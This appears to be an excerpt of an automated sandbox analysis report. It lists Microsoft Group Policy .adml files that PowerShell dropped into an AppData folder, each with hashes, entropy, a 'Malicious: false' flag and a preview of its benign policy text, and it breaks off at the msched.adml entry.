C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsFirewall.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (1085), with CRLF line terminators
Category:	dropped
Size (bytes):	43147
Entropy (8bit):	4.809526069081037
Encrypted:	false
SSDEEP:	384:1OHZuj3f3oPzINNKREqPRLHN83hOzwPvW+0NQkAV2ld0lrlBjSMDt3sKaT7c7cA:Z3jNNsohbvW+0NQkAV2ld0lrlB7
MD5:	0DDDC70E928C3191D6DB487772FCDDD6
SHA1:	124DCC7A766E35E7B8BD9C3EF6C5E62A447F6282
SHA-256:	5625F229BC2CE0518F0689C32B02F208D1B160274D5C9AC00707A15FD4F254AB
SHA-512:	BF17199483BB0DA38AEA1B64BC98CDED7F000B264BC45444423AC60D710E5855445BEB097523D28FB305E82824B75A4C76F99BA4488D9FA22754853A0BBDC073
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WF_AllowedPrograms_Help">Allows you to view and change the program exceptions list defined by Group Policy. Windows Firewall uses two program exception lists: one is defined by Group Policy settings and the other is defined by the Windows Firewall component in Control Panel.....If you enable this policy setting, you can view and change the program exceptions list defined by Group Policy. If you add a program to this list and set its status to Enabled, that program can receive unsolicited incoming messages on any po

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMail.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1162
Entropy (8bit):	4.9740818694409095
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61ynrrl8q+O0jSBC7knRupMRud+FV:cgeD5x8gm8fKs2q2SA7aoMzFV
MD5:	2CDED79A2DD5C6D41BFAA7567008F5CD
SHA1:	EC6C5B95AF0DC5559BD8013B3150600AFDCEEEBF
SHA-256:	9C7A2043D9D255F11092CE1303ABFD599BBEFC4459D1C87308D4738E2E7225A2
SHA-512:	C78FC573B695F8C1AE28056E1A19D80EBCB840D8FC7576353E50951043BC4E2F2E020DB9AE1BF2B81F53DF936E34C40BD1B84322F117B898E01B128D01BE1A33
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffCommunities">Turn off the communities features</string>.. <string id="TurnOffCommunities_help">Windows Mail will not check your newsgroup servers for Communities support.</string>.. <string id="TurnOffWindowsMail">Turn off Windows Mail application</string>.. <string id="WindowsMail">Windows Mail</string>.. <string id="WindowsMail_help">Denies or allows access to the Windows Mail application.....If you enable this setting, access to the Windows Mail application is denied.....If you disable

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMediaDRM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (432), with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	4.844281894305683
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKmlUrPmP6TuZY4UG4c2SDlSFV:LeD5pm6lY1TuCG4IDUFV
MD5:	0BEF85C5A51F0980D97B8F87CC124C6B
SHA1:	72C086550C97C4E87B55D7171AA36E1EA33F1371
SHA-256:	EEFF3058ED45FA9E18846EE53BE4EF621B20BA2D7BB4535A81CDBF8066604E68
SHA-512:	CDD4647BC6B6CE9A3F1ED741C0929C1C768F0E4AF1B2DE27D7C161153CA744117FC34CFEF91C5DC72EDB8AE7FAD91C95F5125E90F2F02ACC27796A37B6E9B190
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableOnline">Prevent Windows Media DRM Internet Access</string>.. <string id="DisableOnlineExplain">Prevents Windows Media Digital Rights Management (DRM) from accessing the Internet (or intranet).....When enabled, Windows Media DRM is prevented from accessing the Internet (or intranet) for license acquisition and security upgrades.....When this policy is enabled, programs are not able to acquire licenses for secure content, upgrade Windows Media DRM security components, or restore backed up content licenses

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMediaPlayer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (560), with CRLF line terminators
Category:	dropped
Size (bytes):	22067
Entropy (8bit):	4.725628900708413
Encrypted:	false
SSDEEP:	384:mndYKgb1n1M2UKzDSLikfF6vkRssT0vdtUL607p7aH:cbu3kQDGfFRsY0vQB7pc
MD5:	2E98C6915989DDC7243EFCC53275A5FC
SHA1:	D83FCE256850CA49F4F58F3D6DE0EFA6F1524B03
SHA-256:	AC668C6094254BED8D12F1BF3B6D8E60B552C288ACF47FAB101AB889BA9D824E
SHA-512:	D03A54A7ECB7186CDAE5EE39795F9B688C3E193847D0ED0F15CDF3EFC70077DDF2E572A2A5996641A000C4BECCF6C3E090A21FDEFB2D38B996EFF1D9F4771458
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Autodetect">Autodetect</string>.. <string id="ConfigureHTTPProxySettings">Configure HTTP Proxy</string>.. <string id="ConfigureHTTPProxySettingsExplain">This policy setting allows you to specify the HTTP proxy settings for Windows Media Player.....If you enable this policy setting, select one of the following proxy types:....- Autodetect: the proxy settings are automatically detected...- Custom: unique proxy settings are used...- Use browser proxy settings: browser's proxy settings are used.....If the Cus

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMessenger.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2609
Entropy (8bit):	4.83243600779635
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKurmiSL30cT3cCtwpYS3tyLmHI+P25YS3t3zdFV:LeD5pmD7TMSy2FV
MD5:	3B589ADE17CCE578D294FF56D65F5321
SHA1:	3885D1E98889369FCDF0570B76601B0EEAAEED09
SHA-256:	BA36F02C4F20E6A6075C3091D0FD5BC81F6589552889FE4055C4BD90831A7699
SHA-512:	4BA6FE1BFB1209B03EA09ADDC64C288D9F076CD72EF968517E12A60AB8EC2060EF877D268ADA856D1B5BD4AA55CAE784D95F033FA839B66A84A039F8F0EFA206
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WinMSG_NoAutoStartWindowsMsg_Comp">Do not automatically start Windows Messenger initially</string>.. <string id="WinMSG_NoAutoStartWindowsMsg_Help">This policy setting prevents Windows Messenger from automatically running at logon. ....If you enable this policy setting, Windows Messenger is not loaded automatically when a user logs on.....If you disable or do not configure this policy setting, Windows Messenger will be loaded automatically at logon.....Note: This policy setting simply prevents Windows Messenge

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsProducts.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5639
Entropy (8bit):	4.939572011046928
Encrypted:	false
SSDEEP:	96:LeD5a2Uy2oPZVH9GQPVtmkPl7Q6sP9dBIP0KP6bLPbxTPJiPG5CP5ubPbDyG7kWq:ENPnOXiVyZcNmTDxun
MD5:	14C496DDE1D1ACC8B3809CF194122870
SHA1:	4A500C7707FD2791A0118C078D5113B0EF4A2844
SHA-256:	C662D7E4BF2848728B8F335734CB6500C40E88727F1ABFABCD1E097B4C6B4FB3
SHA-512:	5FF521B1B1A903132003B2F20BE3502BA69388D8A9839EB4B8485B56EFB71751B0B69AFC0AF56B0601910A685CE4025F43930A1C24FCD8DDB585A8E17AD35760
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista products table</displayName>.. <description>This file contains all the product definitions used in supported on definitions.</description>.... <resources>.. <stringTable>.. Microsoft Windows -->.. <string id="MicrosoftWindows">Windows operating system</string>.. <string id="MicrosoftWindows2000">Windows 2000 operating systems</string>.. <string id="MicrosoftWindows2000_RTM">Windows 2000</string>.. <string id="MicrosoftWindows2000_SP1">Windows 2000 Service Pack 1</string>.. <string id="MicrosoftWindows2000_SP2">Windows 2000 Service Pack 2</string>.. <string id="MicrosoftWindows2000_SP3">Windows 2000

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsRemoteManagement.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (354), with CRLF line terminators
Category:	dropped
Size (bytes):	14554
Entropy (8bit):	4.769003944604622
Encrypted:	false
SSDEEP:	192:EGUQ3V7eAfrBxq5L/cPcFS5YCZXGSqHL/LmLlUCEXjNi2+J1+sEG:9tBc5LUPcKYCZXGSqHDLmBcNi2S
MD5:	E24B954C1451F81FC8559A0F42D8B804
SHA1:	02CDBB99F2546ED8DD467B9799FDA9DECFE1F716
SHA-256:	A8B80A925FCC599E485029B1833C58865A6A16D872FB8766F9ACB8A1E0752D93
SHA-512:	156521221250B6029798C10A2BF138954280AEE73D34FEFCC6D6B3ABB9399824B9135D76A2F8FF1F975F1818D123E6D56DCAD7655E6D6EC5851E7D661926A802
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowAutoConfig">Allow remote server management through WinRM</string>.. <string id="AllowBasic">Allow Basic authentication</string>.. <string id="AllowBasicClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client uses Basic authentication.....If you enable this policy setting, the WinRM client uses Basic authentication. If WinRM is configured to use HTTP transport, the user name and password are sent over the network as clear text.....If you disable or do

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsRemoteShell.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5497
Entropy (8bit):	4.839558778753586
Encrypted:	false
SSDEEP:	96:LeD5pmCfYYOpQgxeUMP5pWuPG47CngUmOuWg9m56V:EBfY/MPCCG4OngUq0o
MD5:	157A758A1233F9764CDFFCB79F8ADAB2
SHA1:	F1203844E770993418DCB257146C5BF98532F5C0
SHA-256:	35C10ECD562212B9C242ABCEA3EECD82965F173B8F8F2A848F1DD94F725EF0A1
SHA-512:	8E70D00D0FEA7F5164EC8BA0FF8B7F548A76A830DA19094827590D46399C4A1F5E21AA2054B5637F1C91095957DE1610C28BCC3974ED3FB36BE3ED6F2D067D45
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowRemoteShellAccess">Allow Remote Shell Access</string>.. <string id="AllowRemoteShellAccess_Help">This policy setting configures access to remote shells.....If you enable this policy setting and set it to False, new remote shell connections are rejected by the server.....If you disable or do not configure this policy setting, new remote shell connections are allowed.</string>.. <string id="IdleTimeout">Specify idle Timeout</string>.. <string id="IdleTimeout_Help">This policy setting configures th

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsServer.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1011
Entropy (8bit):	5.086298346478668
Encrypted:	false
SSDEEP:	24:2dgeD5eo8x4+cCk2q1qOyENX/itRgv8FFV:cgeD5x8lcT/XNUFFV
MD5:	14AEA48E9379243660E8B568A71EF533
SHA1:	1EACA2C4A36AB2762757FA7CAA1D4256910ECC95
SHA-256:	A96786FAA32516C2738C2EC94E676F3D339732AB39318D7CDFFA478A2BAE1231
SHA-512:	24AF5CA8EB9650B61FF0A01467A36DD3F55C90741A4FD04C067420A3E150B57F50ADD536513B4D3F0E7A1EC37138205850FFAAED51A1525E1F063C737EFB50E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Server 2008 base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by server components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008">At least Windows Server 2008</string>.. <string id="SUPPORTED_WindowsServer2003R2">At least Windows Server 2003 R2</string>.. <string id="ServerComponents">Server Components</string>.. <string id="ServerComponents_Help">Contains settings for server operating system components.</string>.. </stringTable>.. </resources>..</policyDefinitionR

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsUpdate.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (561), with CRLF line terminators
Category:	dropped
Size (bytes):	34731
Entropy (8bit):	4.71530009460394
Encrypted:	false
SSDEEP:	384:xtl2CSosXR2nMZIvHWRzwjxqDx6rUtuLTaUL4wl2bux0AcY5Bnn6aaF8MSaUVNKl:xtlwhQMZI/W5w8t6rjxXcYXnhaa3Tu
MD5:	1B4DF1C94FAE81C341ABEA40C9ADAD9C
SHA1:	7DBDE04EFAF2D6B703417CC6FB0B146D6FD4214F
SHA-256:	2AEC8DCD9608B57D3D65321B399FAA530552027F0E3CA814F477816DF803E201
SHA-512:	4CFCE39BA34EE283EEC89900AFCA583AE9C0AE86CAA3EE8EC90891347825AF81DD82BD08960551852C6B7C8FD77B5ECDE9BA75C16A3986B7663CB494E3C6E30A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->.. .. Note that white space is preserved as is in the text shown in the Group Policy UI... Don't add extra line breaks at the beginning and end of text strings,.. and make sure that lines of text start in the FIRST column... -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WU_SUPPORTED_Windows7ToXPSP2">Windows 7, Windows Server 2008 R2, Windows Vista, Windows XP SP2</string>.. <string id="WU_SUPPORTED_Windows7_To_Win2kSP3_Or_XPSP1">Windows 7, Windows Server 2008 R2, Windows Vista, Windows Server 2003, Windows XP SP2, Windows XP SP1 , Windows 2000

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Winsrv.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
Category:	dropped
Size (bytes):	1453
Entropy (8bit):	4.91354096133356
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yQ2X/L2jnwwvXzAd7l4d7FFV:cgeD5x8gm8fKj2T27NmEFV
MD5:	76D4B8899387BCD0C081D4301E1B18DE
SHA1:	EBC1DD18A8893ED391379021941451D89692CDCD
SHA-256:	41331BF31C4BA79B1FF7169EFA27CF37AEE5ED269C1C6894AF78F3F6FB40AE59
SHA-512:	629E37A4E24C60A3E34795F17A5E132DBDAEF40F43AF01B451F6024A4FFC93D36F0381B0B413CE2374778C9D50326345BF0B460D7CCD8F8B5CB1A747CD66F1FF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBlockingAppsAtShutdown">Turn off automatic termination of applications that block or cancel shutdown</string>.. <string id="AllowBlockingAppsAtShutdown_Explain">This policy setting specifies whether Windows will allow console applications and GUI applications without visible top-level windows to block or cancel shutdown. By default, such applications are automatically terminated if they attempt to cancel shutdown or block it indefinitely.....If you enable this setting, console applications or GUI applicat

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WordWheel.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2619
Entropy (8bit):	4.83283675002977
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKEupdt44XktQFqMQFbC1RARWJUudgJjT5YMcxL5oV:LeD5pmBhIQwMQE1E5Pk9oV
MD5:	A5FE2005E14E5E7E8792CE0C2BDF53A8
SHA1:	D4EE1B57FE5C5387E241B51F6209DDD45A6D5BE4
SHA-256:	8CB5F08BC1D73EE9C83EF7043A8BDA0CF250E7BEDD1C84E700E6A8A913BEAF86
SHA-512:	332BF547D8883DF20AA82D2C6F9E3DCD89E2997EC16436A377F6135DF1136B595A9B91EB91C70BD3068F71EBA72007C4DAE32D3B0584A5FB392A9158A57036B7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomSearch">Custom Instant Search Internet search provider</string>.. <string id="CustomSearch_Explain">Set up the menu name and URL for the custom Internet search provider.....If you enable this setting, the specified menu name and URL will be used for Internet searches.....If you disable or not configure this setting, the default Internet search provider will be used.</string>.. <string id="NoSearchInternetInWordWheel">Hide the "Search the Internet" link from the Search box drop down.</string>..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WorkFolders-Client.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (591), with CRLF line terminators
Category:	dropped
Size (bytes):	3464
Entropy (8bit):	4.792120480185555
Encrypted:	false
SSDEEP:	48:cmD5x8gm8fK9186+SciILEl1h8gCgU+7AJcih/qAUJhbWEPIV:PD5pmh186+Sc8h8XrJcEQJxWEPIV
MD5:	F6075FA597F6343205F02CFAF7CF87A7
SHA1:	7A1F11393676AF8A2B8C95EEDE05007A6F2DB31E
SHA-256:	B6A4F7EBE7A44F81B7A5D4C7A38FEA3FCFCD184FA16E46863C1535323197BE1A
SHA-512:	40358DE36BFC342FE314B6FADACA3B1523BB05658F792F1306FC0E4334E50CADD55777069F59E0483C77A5D13C07293909F4BD2596757EF7B2D3504D37522A9A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_WorkFolders">Work Folders</string>.. <string id="Pol_MachineEnableWorkFolders">Force automatic setup for all users</string>.. <string id="Pol_MachineEnableWorkFolders_Help">This policy setting specifies whether Work Folders should be set up automatically for all users of the affected computer... ..If you enable this policy setting, Work Folders will be set up automatically for all users of the affected computer. This prevents users from choosing not to use Work Folders on the computer; it also pr

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WorkplaceJoin.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1317
Entropy (8bit):	5.059573414260519
Encrypted:	false
SSDEEP:	24:2d1D5eo8gWt4+3FGxiKRI/LeVQLhqeS1FLiRj/eRBAlA5TtT849eLaa6rTM7ijFV:c1D5x8gmjKhGLJ8uwdxPkOr1jFV
MD5:	68E7E1BEE13094C1C0F9896F82B4D741
SHA1:	5D7F87C220EA3EB57322C9FC0986B2EFCAEBB01A
SHA-256:	4754F8A9B020216A0F9CA4C7357A6794D3C98735D9B7857FCBC19ED1401021E3
SHA-512:	6CCD89B24AC4D9232D45A91E3002F69230BA38A878057ABC0A0BD07F3B7A44CC9E97BE29267CBB56C9D3304EC9CA75C3E662DA1D2E154F3155A029F30C6ACF91
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2013 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Automatically workplace join client computers</displayName>.. <description>This setting lets you configure how domain-joined client computers become workplace-joined with domain users in your organization.</description>.. <resources>.. <stringTable>.. <string id="WJ_WorkplaceJoinCategory">Workplace Join</string>.. <string id="WJ_AutoJoinExplain">This setting lets you configure how domain joined client computers become workplace joined with domain users at your organization.....If this setting is enabled, domain-joined client computers will automatically become workplace-joined upon domain user logon.....Note: Additional requirements may appl

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\fthsvc.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1812
Entropy (8bit):	4.867263783263397
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKe92tf3bDtMsabsl5/n0BshFV:LeD5pmk2tf/Ojbg1nCshFV
MD5:	418D7AC091847AB77D095C57FA41A684
SHA1:	3344D9A7DF3250DC67E0AE77A3852504B57FD45D
SHA-256:	1264F3A19797D8DAEE79006048CF0430FC85D1FA8AAC8C64C5A60351C7753901
SHA-512:	86C39CFFAC76B5417780116DCD6E264C05939C52D7E8920330FABC657AFC34EE9EC0C09EDB871B9F6B3E9C75CD1E12029B29DF6A8D12CB24A8D3810D71BDB8D2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Fault Tolerant Heap</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting permits or prohibits the Diagnostic Policy Service (DPS) from automatically resolving any heap corruption problems.....If you enable this policy setting, the DPS detects, troubleshoots, and attempts to resolve automatically any heap corruption problems.....If you disable this policy setting, Windows cann

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\hotspotauth.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1509
Entropy (8bit):	4.960947634536891
Encrypted:	false
SSDEEP:	24:2ddD5eo8gWt4+3FWDELiHkM7QQhsrPKkoXWmWUD64WPb1KOFV:cdD5x8gmID1q+kkb967Pb0OFV
MD5:	C8F213BDF5B362440A28D5D5FDD86FB8
SHA1:	587A99FD8725FBBEF863D8D01D3993123817A8B3
SHA-256:	8A6601421A6DE212B6B1FF4990ED462251F3C4C75CB37D7BBA0AFC814B0C50F1
SHA-512:	966BE4DBF177B42253853A03B08447B48315FF51CF05C9FA88FA2A5A344CC9E02A357D7A7FAF61A831EDA39FA9AF35B88389FB8EAFE6BA72A8D7F8BCE90EFFB1
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Hotspot Authentication Group Policy Settings</displayName>.. <description>Hotspot Authentication Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="HotspotAuth_Category">Hotspot Authentication</string>.. <string id="HotspotAuth_Enable">Enable Hotspot Authentication</string>.. <string id="HotspotAuth_Enable_Help">This policy setting defines whether Wi-Fi hotspots are probed for Wireless Internet Service Provider roaming (WISPr) protocol support.....If a Wi-Fi hotspot supports the WISPr protocol, users can submit credentials when manually connecting to the network. If authentication is successful, users will b

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\iSCSI.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (402), with CRLF line terminators
Category:	dropped
Size (bytes):	5220
Entropy (8bit):	4.806973059665715
Encrypted:	false
SSDEEP:	96:LeD5pmCaYOcq03f1QSxMMdeuRr48/TNZvOfxk5DxKhFwfDFpm8h7w1D7zDGFV:EPaYO503f1QSy+euRD/TNZvOfxk5DxKQ
MD5:	FE14E28C69993ACCEC221BE3C7A99E5C
SHA1:	AF4A9B9485D3CAE6BB21DC2932A705247C20EC01
SHA-256:	68B3DF1ED58900E693440D614266C2F8FA20A87F75B9183A5BEBFAB5C3C6B4C2
SHA-512:	B60557A69068D7F37CE89C724D22340E464E4DFDE039E9E4A10BE2F4458C165456872632D886EADBAA7AC72F23DAB8AF32EC1A1DAE2605EDC7D25004E878772B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="iSCSI_Category">iSCSI</string>.. <string id="iSCSIDiscovery_Category">iSCSI Target Discovery</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers">Do not allow manual configuration of iSNS servers</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers_Help">If enabled then new iSNS servers may not be added and thus new targets discovered via those iSNS servers; existing iSNS servers may not be removed. If disabled then new iSNS servers may be added and thus new targets discovered via those

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\msched.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
